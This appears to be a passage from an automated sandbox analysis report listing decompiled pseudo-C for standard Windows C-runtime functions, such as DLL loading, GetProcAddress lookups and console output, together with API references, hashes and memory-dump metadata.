                          			E6F24DD62(void* __ecx, signed int* _a4, intOrPtr _a8) {
				WCHAR* _v8;
				signed int _t11;
				WCHAR* _t12;
				struct HINSTANCE__* _t16;
				struct HINSTANCE__* _t18;
				signed int* _t22;
				signed int* _t26;
				struct HINSTANCE__* _t29;
				WCHAR* _t31;
				void* _t32;

				_t26 = _a4;
				while(_t26 != _a8) {
					_t11 =  *_t26;
					_t22 = 0x6f28b208 + _t11 * 4;
					_t29 =  *_t22;
					if(_t29 == 0) {
						_t12 =  *(0x6f282ec8 + _t11 * 4);
						_v8 = _t12;
						_t29 = LoadLibraryExW(_t12, 0, 0x800);
						if(_t29 != 0) {
							L13:
							 *_t22 = _t29;
							if( *_t22 != 0) {
								FreeLibrary(_t29);
							}
							L15:
							_t16 = _t29;
							L12:
							return _t16;
						}
						_t18 = GetLastError();
						if(_t18 != 0x57) {
							L8:
							 *_t22 = _t18 | 0xffffffff;
							L9:
							_t26 =  &(_t26[1]);
							continue;
						}
						_t31 = _v8;
						_t18 = E6F24F838(_t31, L"api-ms-", 7);
						_t32 = _t32 + 0xc;
						if(_t18 == 0) {
							goto L8;
						}
						_t18 = LoadLibraryExW(_t31, 0, 0);
						_t29 = _t18;
						if(_t29 != 0) {
							goto L13;
						}
						goto L8;
					}
					if(_t29 != 0xffffffff) {
						goto L15;
					}
					goto L9;
				}
				_t16 = 0;
				goto L12;
			}













                          0x6f24dd69
                          0x6f24dddd
                          0x6f24dd6e
                          0x6f24dd70
                          0x6f24dd77
                          0x6f24dd7b
                          0x6f24dd84
                          0x6f24dd93
                          0x6f24dd9c
                          0x6f24dda0
                          0x6f24dde9
                          0x6f24ddeb
                          0x6f24ddef
                          0x6f24ddf2
                          0x6f24ddf2
                          0x6f24ddf8
                          0x6f24ddf8
                          0x6f24dde4
                          0x6f24dde8
                          0x6f24dde8
                          0x6f24dda2
                          0x6f24ddab
                          0x6f24ddd5
                          0x6f24ddd8
                          0x6f24ddda
                          0x6f24ddda
                          0x00000000
                          0x6f24ddda
                          0x6f24ddad
                          0x6f24ddb8
                          0x6f24ddbd
                          0x6f24ddc2
                          0x00000000
                          0x00000000
                          0x6f24ddc9
                          0x6f24ddcf
                          0x6f24ddd3
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6f24ddd3
                          0x6f24dd80
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6f24dd82
                          0x6f24dde2
                          0x00000000

                          APIs
                          • FreeLibrary.KERNEL32(00000000,?,?,6F24DE23,00000000,?,00000001,00000000,?,6F24DE9A,00000001,FlsFree,6F282F84,FlsFree,00000000), ref: 6F24DDF2
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.641042475.000000006F231000.00000020.00020000.sdmp, Offset: 6F230000, based on PE: true
                          • Associated: 00000004.00000002.641004987.000000006F230000.00000002.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641140882.000000006F258000.00000002.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641221834.000000006F28A000.00000004.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641232429.000000006F28C000.00000008.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641246076.000000006F28D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: FreeLibrary
                          • String ID: api-ms-
                          • API String ID: 3664257935-2084034818
                          • Opcode ID: 052e532f2e4e2776d5c70c8b8e29c90721a9aec9252255fd386daa6f2d46b7a6
                          • Instruction ID: e78c683caaba6c4dc54361d52da155288aa6ea6cda44484c9f4701bb61e2ee14
                          • Opcode Fuzzy Hash: 052e532f2e4e2776d5c70c8b8e29c90721a9aec9252255fd386daa6f2d46b7a6
                          • Instruction Fuzzy Hash: 8F119433A55A2ADBDF164BA8CC44B8A33A5AF03771F500251E921AB2C4D6E0F915CED5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6F24EC2D, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMON
                          Download Yara Rule
                          C-Code - Quality: 25%
                          			E6F24EC2D(intOrPtr _a4) {
				char _v16;
				signed int _v20;
				signed int _t11;
				int _t14;
				void* _t16;
				void* _t20;
				int _t22;
				signed int _t23;

				_t11 =  *0x6f28a4a4; // 0x219c2278
				 *[fs:0x0] =  &_v16;
				_v20 = _v20 & 0x00000000;
				_t14 =  &_v20;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t14, _t11 ^ _t23, _t20, _t16,  *[fs:0x0], E6F257473, 0xffffffff);
				if(_t14 != 0) {
					_t14 = GetProcAddress(_v20, "CorExitProcess");
					_t22 = _t14;
					if(_t22 != 0) {
						 *0x6f258154(_a4);
						_t14 =  *_t22();
					}
				}
				if(_v20 != 0) {
					_t14 = FreeLibrary(_v20);
				}
				 *[fs:0x0] = _v16;
				return _t14;
			}











                          0x6f24ec42
                          0x6f24ec4d
                          0x6f24ec53
                          0x6f24ec57
                          0x6f24ec62
                          0x6f24ec6a
                          0x6f24ec74
                          0x6f24ec7a
                          0x6f24ec7e
                          0x6f24ec85
                          0x6f24ec8b
                          0x6f24ec8b
                          0x6f24ec7e
                          0x6f24ec91
                          0x6f24ec96
                          0x6f24ec96
                          0x6f24ec9f
                          0x6f24eca9

                          APIs
                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,219C2278,00000000,?,00000000,6F257473,000000FF,?,6F24EBBD,?,?,6F24EB91,?), ref: 6F24EC62
                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6F24EC74
                          • FreeLibrary.KERNEL32(00000000,?,00000000,6F257473,000000FF,?,6F24EBBD,?,?,6F24EB91,?), ref: 6F24EC96
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.641042475.000000006F231000.00000020.00020000.sdmp, Offset: 6F230000, based on PE: true
                          • Associated: 00000004.00000002.641004987.000000006F230000.00000002.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641140882.000000006F258000.00000002.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641221834.000000006F28A000.00000004.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641232429.000000006F28C000.00000008.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641246076.000000006F28D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: AddressFreeHandleLibraryModuleProc
                          • String ID: CorExitProcess$mscoree.dll
                          • API String ID: 4061214504-1276376045
                          • Opcode ID: aae84615cfcd08d62ceafa32aac379da060eabb2d8d4fb63e8d47a524ceddaa0
                          • Instruction ID: 7c43fe34d09920840e3d75bc57a6ad997827c632fab0b8dc7fd370ddc31fd519
                          • Opcode Fuzzy Hash: aae84615cfcd08d62ceafa32aac379da060eabb2d8d4fb63e8d47a524ceddaa0
                          • Instruction Fuzzy Hash: 26016271914959AFDF01DF50CD09FEEBBB9FB05721F004626E821A26D0DBB4A914CF90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6F23C420, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9libraryloaderCOMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E6F23C420() {
				struct HINSTANCE__* _t1;

				_t1 = GetModuleHandleA("kernel32");
				if(_t1 == 0) {
					return _t1;
				} else {
					return GetProcAddress(_t1, "GetSystemTimePreciseAsFileTime");
				}
			}




                          0x6f23c425
                          0x6f23c42d
                          0x6f23c43c
                          0x6f23c42f
                          0x6f23c43b
                          0x6f23c43b

                          APIs
                          • GetModuleHandleA.KERNEL32(kernel32), ref: 6F23C425
                          • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 6F23C435
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.641042475.000000006F231000.00000020.00020000.sdmp, Offset: 6F230000, based on PE: true
                          • Associated: 00000004.00000002.641004987.000000006F230000.00000002.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641140882.000000006F258000.00000002.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641221834.000000006F28A000.00000004.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641232429.000000006F28C000.00000008.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641246076.000000006F28D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: AddressHandleModuleProc
                          • String ID: GetSystemTimePreciseAsFileTime$kernel32
                          • API String ID: 1646373207-392834919
                          • Opcode ID: 19d99a790b8babe3ec3f0a432ebfd41b9186ae92e6f71d63aea6622c6f1c21bd
                          • Instruction ID: 60f7e1641081907d5c4a596a78c5507aa3e70df9f5b5b7a1eb00595d49ad936e
                          • Opcode Fuzzy Hash: 19d99a790b8babe3ec3f0a432ebfd41b9186ae92e6f71d63aea6622c6f1c21bd
                          • Instruction Fuzzy Hash: 6AB092B0A1891A67AEA1AB724E0CBA73A5BA9A2A623818440A111E1881CEB0D034DD21
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6F23C440, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9libraryloaderCOMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E6F23C440() {
				struct HINSTANCE__* _t1;

				_t1 = GetModuleHandleA("kernel32");
				if(_t1 == 0) {
					return _t1;
				} else {
					return GetProcAddress(_t1, "SetThreadDescription");
				}
			}




                          0x6f23c445
                          0x6f23c44d
                          0x6f23c45c
                          0x6f23c44f
                          0x6f23c45b
                          0x6f23c45b

                          APIs
                          • GetModuleHandleA.KERNEL32(kernel32), ref: 6F23C445
                          • GetProcAddress.KERNEL32(00000000,SetThreadDescription), ref: 6F23C455
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.641042475.000000006F231000.00000020.00020000.sdmp, Offset: 6F230000, based on PE: true
                          • Associated: 00000004.00000002.641004987.000000006F230000.00000002.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641140882.000000006F258000.00000002.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641221834.000000006F28A000.00000004.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641232429.000000006F28C000.00000008.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641246076.000000006F28D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: AddressHandleModuleProc
                          • String ID: SetThreadDescription$kernel32
                          • API String ID: 1646373207-1950310818
                          • Opcode ID: a98d238dff4fd482f6ef8e0cce7e975aac2d6d8af0efc28998ecfd3e1d07668f
                          • Instruction ID: c0a4543d4cab153006b6b26ff98fc1db5f9aa5b800c2669af273dfd2b4d868e7
                          • Opcode Fuzzy Hash: a98d238dff4fd482f6ef8e0cce7e975aac2d6d8af0efc28998ecfd3e1d07668f
                          • Instruction Fuzzy Hash: 9BB012F0A1891967BEB1EB724D0CBB73B9BA9516723418440B211E1480CFF0C038DD71
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6F23C4A0, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9libraryloaderCOMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E6F23C4A0() {
				struct HINSTANCE__* _t1;

				_t1 = GetModuleHandleA("ntdll");
				if(_t1 == 0) {
					return _t1;
				} else {
					return GetProcAddress(_t1, "NtReleaseKeyedEvent");
				}
			}




                          0x6f23c4a5
                          0x6f23c4ad
                          0x6f23c4bc
                          0x6f23c4af
                          0x6f23c4bb
                          0x6f23c4bb

                          APIs
                          • GetModuleHandleA.KERNEL32(ntdll), ref: 6F23C4A5
                          • GetProcAddress.KERNEL32(00000000,NtReleaseKeyedEvent), ref: 6F23C4B5
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.641042475.000000006F231000.00000020.00020000.sdmp, Offset: 6F230000, based on PE: true
                          • Associated: 00000004.00000002.641004987.000000006F230000.00000002.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641140882.000000006F258000.00000002.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641221834.000000006F28A000.00000004.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641232429.000000006F28C000.00000008.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641246076.000000006F28D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: AddressHandleModuleProc
                          • String ID: NtReleaseKeyedEvent$ntdll
                          • API String ID: 1646373207-31681898
                          • Opcode ID: 7654e89b47ae87a783b98c0b6f7e90754b22282051a453b0264f639698fe59f3
                          • Instruction ID: f8d98b064041920b46fe67e5d2916741847fb74598d9dda7c52f232d62056881
                          • Opcode Fuzzy Hash: 7654e89b47ae87a783b98c0b6f7e90754b22282051a453b0264f639698fe59f3
                          • Instruction Fuzzy Hash: B1B092F0A1896A679EB06B714D0CBA63A6AE9417323818445E556D1480EEB49024ED32
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6F23C480, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9libraryloaderCOMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E6F23C480() {
				struct HINSTANCE__* _t1;

				_t1 = GetModuleHandleA("ntdll");
				if(_t1 == 0) {
					return _t1;
				} else {
					return GetProcAddress(_t1, "NtWaitForKeyedEvent");
				}
			}




                          0x6f23c485
                          0x6f23c48d
                          0x6f23c49c
                          0x6f23c48f
                          0x6f23c49b
                          0x6f23c49b

                          APIs
                          • GetModuleHandleA.KERNEL32(ntdll), ref: 6F23C485
                          • GetProcAddress.KERNEL32(00000000,NtWaitForKeyedEvent), ref: 6F23C495
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.641042475.000000006F231000.00000020.00020000.sdmp, Offset: 6F230000, based on PE: true
                          • Associated: 00000004.00000002.641004987.000000006F230000.00000002.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641140882.000000006F258000.00000002.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641221834.000000006F28A000.00000004.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641232429.000000006F28C000.00000008.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641246076.000000006F28D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: AddressHandleModuleProc
                          • String ID: NtWaitForKeyedEvent$ntdll
                          • API String ID: 1646373207-2815205136
                          • Opcode ID: a4ed19d15bf0100a41f6a4225cb67f31f7e51b05cd248ebe7f47f16c8985fc8b
                          • Instruction ID: 0ec20e415a4ab9daebe6626234c3c17df12caae179a5e3c2f5200b7a64d63ec2
                          • Opcode Fuzzy Hash: a4ed19d15bf0100a41f6a4225cb67f31f7e51b05cd248ebe7f47f16c8985fc8b
                          • Instruction Fuzzy Hash: A3B092B0A58A69679EB06B714D0CBA63B7AE9426223418440E11AD1480CEB0E024ED33
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6F23C4C0, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9libraryloaderCOMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E6F23C4C0() {
				struct HINSTANCE__* _t1;

				_t1 = GetModuleHandleA("ntdll");
				if(_t1 == 0) {
					return _t1;
				} else {
					return GetProcAddress(_t1, "NtCreateKeyedEvent");
				}
			}




                          0x6f23c4c5
                          0x6f23c4cd
                          0x6f23c4dc
                          0x6f23c4cf
                          0x6f23c4db
                          0x6f23c4db

                          APIs
                          • GetModuleHandleA.KERNEL32(ntdll), ref: 6F23C4C5
                          • GetProcAddress.KERNEL32(00000000,NtCreateKeyedEvent), ref: 6F23C4D5
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.641042475.000000006F231000.00000020.00020000.sdmp, Offset: 6F230000, based on PE: true
                          • Associated: 00000004.00000002.641004987.000000006F230000.00000002.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641140882.000000006F258000.00000002.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641221834.000000006F28A000.00000004.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641232429.000000006F28C000.00000008.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641246076.000000006F28D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: AddressHandleModuleProc
                          • String ID: NtCreateKeyedEvent$ntdll
                          • API String ID: 1646373207-1373576770
                          • Opcode ID: 50b8eb86bebd6ae00d3d3103f00a0f1c2270f8536ed1bae677b923a7fb825672
                          • Instruction ID: aa611dd1f1634581a167c5fdbee96b67aeb65fa383d4a889a78f454535f33e11
                          • Opcode Fuzzy Hash: 50b8eb86bebd6ae00d3d3103f00a0f1c2270f8536ed1bae677b923a7fb825672
                          • Instruction Fuzzy Hash: 4CB092B0A589A96B9EB06B714D0CBA63B6AE9417223818441E116D2881CEB08024ED33
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6F254089, Relevance: 6.3, APIs: 4, Instructions: 338fileCOMMON
                          Download Yara Rule
                          C-Code - Quality: 78%
                          			E6F254089(intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16, intOrPtr _a20) {
				char _v16;
				signed int _v20;
				char _v28;
				char _v35;
				signed char _v36;
				void _v44;
				long _v48;
				signed char* _v52;
				char _v53;
				long _v60;
				intOrPtr _v64;
				struct _OVERLAPPED* _v68;
				signed int _v72;
				struct _OVERLAPPED* _v76;
				signed int _v80;
				signed int _v84;
				intOrPtr _v88;
				void _v92;
				long _v96;
				signed char* _v100;
				void* _v104;
				intOrPtr _v108;
				char _v112;
				int _v116;
				struct _OVERLAPPED* _v120;
				struct _OVERLAPPED* _v124;
				struct _OVERLAPPED* _v128;
				struct _OVERLAPPED* _v132;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t177;
				signed int _t178;
				signed int _t180;
				int _t186;
				signed char* _t190;
				signed char _t195;
				intOrPtr _t198;
				void* _t200;
				signed char* _t201;
				long _t205;
				intOrPtr _t210;
				void _t212;
				signed char* _t217;
				void* _t224;
				char _t227;
				struct _OVERLAPPED* _t229;
				void* _t238;
				signed int _t240;
				signed char* _t243;
				long _t246;
				intOrPtr _t247;
				signed char* _t248;
				void* _t258;
				intOrPtr _t265;
				void* _t266;
				struct _OVERLAPPED* _t267;
				signed int _t268;
				signed int _t273;
				intOrPtr* _t279;
				signed int _t281;
				signed int _t285;
				signed char _t286;
				long _t287;
				signed int _t291;
				signed char* _t292;
				struct _OVERLAPPED* _t296;
				void* _t299;
				signed int _t300;
				signed int _t302;
				struct _OVERLAPPED* _t303;
				signed char* _t306;
				intOrPtr* _t307;
				void* _t308;
				signed int _t309;
				long _t310;
				signed int _t311;
				signed int _t312;
				signed int _t313;
				void* _t314;
				void* _t315;
				void* _t316;

				_push(0xffffffff);
				_push(E6F2574CA);
				_push( *[fs:0x0]);
				_t315 = _t314 - 0x74;
				_t177 =  *0x6f28a4a4; // 0x219c2278
				_t178 = _t177 ^ _t313;
				_v20 = _t178;
				_push(_t178);
				 *[fs:0x0] =  &_v16;
				_t180 = _a8;
				_t306 = _a12;
				_t265 = _a20;
				_t268 = (_t180 & 0x0000003f) * 0x38;
				_t291 = _t180 >> 6;
				_v100 = _t306;
				_v64 = _t265;
				_v84 = _t291;
				_v72 = _t268;
				_v104 =  *((intOrPtr*)( *((intOrPtr*)(0x6f28b5e0 + _t291 * 4)) + _t268 + 0x18));
				_v88 = _a16 + _t306;
				_t186 = GetConsoleOutputCP();
				_t317 =  *((char*)(_t265 + 0x14));
				_v116 = _t186;
				if( *((char*)(_t265 + 0x14)) == 0) {
					E6F24F760(_t265, _t291, _t317);
				}
				_t307 = _a4;
				_v108 =  *((intOrPtr*)( *((intOrPtr*)(_t265 + 0xc)) + 8));
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t190 = _v100;
				_t292 = _t190;
				_v52 = _t292;
				if(_t190 < _v88) {
					_t300 = _v72;
					_t267 = 0;
					_v76 = 0;
					do {
						_v53 =  *_t292;
						_v68 = _t267;
						_v48 = 1;
						_t273 =  *(0x6f28b5e0 + _v84 * 4);
						_v80 = _t273;
						if(_v108 != 0xfde9) {
							_t195 =  *((intOrPtr*)(_t300 + _t273 + 0x2d));
							__eflags = _t195 & 0x00000004;
							if((_t195 & 0x00000004) == 0) {
								_t273 =  *_t292 & 0x000000ff;
								_t198 =  *((intOrPtr*)( *((intOrPtr*)(_v64 + 0xc))));
								__eflags =  *((intOrPtr*)(_t198 + _t273 * 2)) - _t267;
								if( *((intOrPtr*)(_t198 + _t273 * 2)) >= _t267) {
									_push(_v64);
									_push(1);
									_push(_t292);
									goto L29;
								} else {
									_t217 =  &(_t292[1]);
									_v60 = _t217;
									__eflags = _t217 - _v88;
									if(_t217 >= _v88) {
										 *((char*)(_t300 + _v80 + 0x2e)) =  *_t292;
										 *( *(0x6f28b5e0 + _v84 * 4) + _t300 + 0x2d) =  *( *(0x6f28b5e0 + _v84 * 4) + _t300 + 0x2d) | 0x00000004;
										 *((intOrPtr*)(_t307 + 4)) = _v76 + 1;
									} else {
										_t224 = E6F252A23(_t273, _t292,  &_v68, _t292, 2, _v64);
										_t316 = _t315 + 0x10;
										__eflags = _t224 - 0xffffffff;
										if(_t224 != 0xffffffff) {
											_t201 = _v60;
											goto L31;
										}
									}
								}
							} else {
								_push(_v64);
								_v36 =  *(_t300 + _t273 + 0x2e) & 0x000000fb;
								_t227 =  *_t292;
								_v35 = _t227;
								 *((char*)(_t300 + _t273 + 0x2d)) = _t227;
								_push(2);
								_push( &_v36);
								L29:
								_push( &_v68);
								_t200 = E6F252A23(_t273, _t292);
								_t316 = _t315 + 0x10;
								__eflags = _t200 - 0xffffffff;
								if(_t200 != 0xffffffff) {
									_t201 = _v52;
									goto L31;
								}
							}
						} else {
							_t229 = _t267;
							_t279 = _t273 + 0x2e + _t300;
							while( *_t279 != _t267) {
								_t229 =  &(_t229->Internal);
								_t279 = _t279 + 1;
								if(_t229 < 5) {
									continue;
								}
								break;
							}
							_t302 = _v88 - _t292;
							_v48 = _t229;
							if(_t229 == 0) {
								_t73 = ( *_t292 & 0x000000ff) + 0x6f28abf0; // 0x0
								_t281 =  *_t73 + 1;
								_v80 = _t281;
								__eflags = _t281 - _t302;
								if(_t281 > _t302) {
									__eflags = _t302;
									if(_t302 <= 0) {
										goto L44;
									} else {
										_t309 = _v72;
										do {
											 *((char*)( *(0x6f28b5e0 + _v84 * 4) + _t309 + _t267 + 0x2e)) =  *((intOrPtr*)(_t267 + _t292));
											_t267 =  &(_t267->Internal);
											__eflags = _t267 - _t302;
										} while (_t267 < _t302);
										goto L43;
									}
									L52:
								} else {
									_v132 = _t267;
									__eflags = _t281 - 4;
									_v128 = _t267;
									_v60 = _t292;
									_v48 = (_t281 == 4) + 1;
									_t238 = E6F254CEF( &_v132,  &_v68,  &_v60, (_t281 == 4) + 1,  &_v132, _v64);
									_t316 = _t315 + 0x14;
									__eflags = _t238 - 0xffffffff;
									if(_t238 != 0xffffffff) {
										_t240 =  &(_v52[_v80]);
										__eflags = _t240;
										_t300 = _v72;
										goto L21;
									}
								}
							} else {
								_t285 = _v72;
								_t243 = _v80 + 0x2e + _t285;
								_v80 = _t243;
								_t246 =  *((char*)(( *_t243 & 0x000000ff) + 0x6f28abf0)) + 1;
								_v60 = _t246;
								_t247 = _t246 - _v48;
								_v76 = _t247;
								if(_t247 > _t302) {
									__eflags = _t302;
									if(_t302 > 0) {
										_t248 = _v52;
										_t310 = _v48;
										do {
											_t286 =  *((intOrPtr*)(_t267 + _t248));
											_t292 =  *(0x6f28b5e0 + _v84 * 4) + _t285 + _t267;
											_t267 =  &(_t267->Internal);
											_t292[_t310 + 0x2e] = _t286;
											_t285 = _v72;
											__eflags = _t267 - _t302;
										} while (_t267 < _t302);
										L43:
										_t307 = _a4;
									}
									L44:
									 *((intOrPtr*)(_t307 + 4)) =  *((intOrPtr*)(_t307 + 4)) + _t302;
								} else {
									_t287 = _v48;
									_t303 = _t267;
									_t311 = _v80;
									do {
										 *((char*)(_t313 + _t303 - 0x18)) =  *_t311;
										_t303 =  &(_t303->Internal);
										_t311 = _t311 + 1;
									} while (_t303 < _t287);
									_t304 = _v76;
									if(_v76 > 0) {
										E6F24AE10( &_v28 + _t287, _t292, _t304);
										_t287 = _v48;
										_t315 = _t315 + 0xc;
									}
									_t300 = _v72;
									_t296 = _t267;
									_t312 = _v84;
									do {
										 *( *((intOrPtr*)(0x6f28b5e0 + _t312 * 4)) + _t300 + _t296 + 0x2e) = _t267;
										_t296 =  &(_t296->Internal);
									} while (_t296 < _t287);
									_t307 = _a4;
									_v112 =  &_v28;
									_v124 = _t267;
									_v120 = _t267;
									_v48 = (_v60 == 4) + 1;
									_t258 = E6F254CEF( &_v124,  &_v68,  &_v112, (_v60 == 4) + 1,  &_v124, _v64);
									_t316 = _t315 + 0x14;
									if(_t258 != 0xffffffff) {
										_t240 =  &(_v52[_v76]);
										L21:
										_t201 = _t240 - 1;
										L31:
										_v52 = _t201 + 1;
										_t205 = E6F2519B3(_v116, _t267,  &_v68, _v48,  &_v44, 5, _t267, _t267);
										_t315 = _t316 + 0x20;
										_v60 = _t205;
										if(_t205 != 0) {
											if(WriteFile(_v104,  &_v44, _t205,  &_v96, _t267) == 0) {
												L50:
												 *_t307 = GetLastError();
											} else {
												_t292 = _v52;
												_t210 =  *((intOrPtr*)(_t307 + 8)) + _t292 - _v100;
												_v76 = _t210;
												 *((intOrPtr*)(_t307 + 4)) = _t210;
												if(_v96 >= _v60) {
													if(_v53 != 0xa) {
														goto L38;
													} else {
														_t212 = 0xd;
														_v92 = _t212;
														if(WriteFile(_v104,  &_v92, 1,  &_v96, _t267) == 0) {
															goto L50;
														} else {
															if(_v96 >= 1) {
																 *((intOrPtr*)(_t307 + 8)) =  *((intOrPtr*)(_t307 + 8)) + 1;
																 *((intOrPtr*)(_t307 + 4)) =  *((intOrPtr*)(_t307 + 4)) + 1;
																_t292 = _v52;
																_v76 =  *((intOrPtr*)(_t307 + 4));
																goto L38;
															}
														}
													}
												}
											}
										}
									}
								}
							}
						}
						goto L51;
						L38:
					} while (_t292 < _v88);
				}
				L51:
				 *[fs:0x0] = _v16;
				_pop(_t299);
				_pop(_t308);
				_pop(_t266);
				return E6F24A057(_t307, _t266, _v20 ^ _t313, _t292, _t299, _t308);
				goto L52;
			}





















































































                          0x6f25408e
                          0x6f254090
                          0x6f25409b
                          0x6f25409c
                          0x6f25409f
                          0x6f2540a4
                          0x6f2540a6
                          0x6f2540ac
                          0x6f2540b0
                          0x6f2540b6
                          0x6f2540bb
                          0x6f2540c1
                          0x6f2540c4
                          0x6f2540c7
                          0x6f2540ca
                          0x6f2540cd
                          0x6f2540d0
                          0x6f2540da
                          0x6f2540e1
                          0x6f2540e9
                          0x6f2540ec
                          0x6f2540f2
                          0x6f2540f6
                          0x6f2540f9
                          0x6f2540fd
                          0x6f2540fd
                          0x6f254105
                          0x6f25410d
                          0x6f254112
                          0x6f254113
                          0x6f254114
                          0x6f254115
                          0x6f254118
                          0x6f25411a
                          0x6f254120
                          0x6f254126
                          0x6f254129
                          0x6f25412b
                          0x6f25412e
                          0x6f254137
                          0x6f25413d
                          0x6f254140
                          0x6f254147
                          0x6f25414e
                          0x6f254151
                          0x6f25428b
                          0x6f25428f
                          0x6f254292
                          0x6f2542b5
                          0x6f2542bb
                          0x6f2542bd
                          0x6f2542c1
                          0x6f2542f2
                          0x6f2542f5
                          0x6f2542f7
                          0x00000000
                          0x6f2542c3
                          0x6f2542c3
                          0x6f2542c6
                          0x6f2542c9
                          0x6f2542cc
                          0x6f254416
                          0x6f254424
                          0x6f25442d
                          0x6f2542d2
                          0x6f2542dc
                          0x6f2542e1
                          0x6f2542e4
                          0x6f2542e7
                          0x6f2542ed
                          0x00000000
                          0x6f2542ed
                          0x6f2542e7
                          0x6f2542cc
                          0x6f254294
                          0x6f25429b
                          0x6f25429e
                          0x6f2542a1
                          0x6f2542a3
                          0x6f2542a6
                          0x6f2542ad
                          0x6f2542af
                          0x6f2542f8
                          0x6f2542fb
                          0x6f2542fc
                          0x6f254301
                          0x6f254304
                          0x6f254307
                          0x6f25430d
                          0x00000000
                          0x6f25430d
                          0x6f254307
                          0x6f254157
                          0x6f25415a
                          0x6f25415c
                          0x6f25415e
                          0x6f254162
                          0x6f254163
                          0x6f254167
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6f254167
                          0x6f25416c
                          0x6f25416e
                          0x6f254173
                          0x6f254233
                          0x6f25423a
                          0x6f25423b
                          0x6f25423e
                          0x6f254240
                          0x6f2543f0
                          0x6f2543f2
                          0x00000000
                          0x6f2543f4
                          0x6f2543f4
                          0x6f2543f7
                          0x6f254406
                          0x6f25440a
                          0x6f25440b
                          0x6f25440b
                          0x00000000
                          0x6f25440f
                          0x00000000
                          0x6f254246
                          0x6f25424b
                          0x6f25424e
                          0x6f254251
                          0x6f254257
                          0x6f254260
                          0x6f25426b
                          0x6f254270
                          0x6f254273
                          0x6f254276
                          0x6f25427f
                          0x6f25427f
                          0x6f254282
                          0x00000000
                          0x6f254282
                          0x6f254276
                          0x6f254179
                          0x6f25417c
                          0x6f254182
                          0x6f254184
                          0x6f254191
                          0x6f254192
                          0x6f254195
                          0x6f254198
                          0x6f25419d
                          0x6f2543c1
                          0x6f2543c3
                          0x6f2543c5
                          0x6f2543c8
                          0x6f2543cb
                          0x6f2543d7
                          0x6f2543da
                          0x6f2543dc
                          0x6f2543dd
                          0x6f2543e1
                          0x6f2543e4
                          0x6f2543e4
                          0x6f2543e8
                          0x6f2543e8
                          0x6f2543e8
                          0x6f2543eb
                          0x6f2543eb
                          0x6f2541a3
                          0x6f2541a3
                          0x6f2541a6
                          0x6f2541a8
                          0x6f2541ab
                          0x6f2541ad
                          0x6f2541b1
                          0x6f2541b2
                          0x6f2541b3
                          0x6f2541b7
                          0x6f2541bc
                          0x6f2541c6
                          0x6f2541cb
                          0x6f2541ce
                          0x6f2541ce
                          0x6f2541d1
                          0x6f2541d4
                          0x6f2541d6
                          0x6f2541d9
                          0x6f2541e2
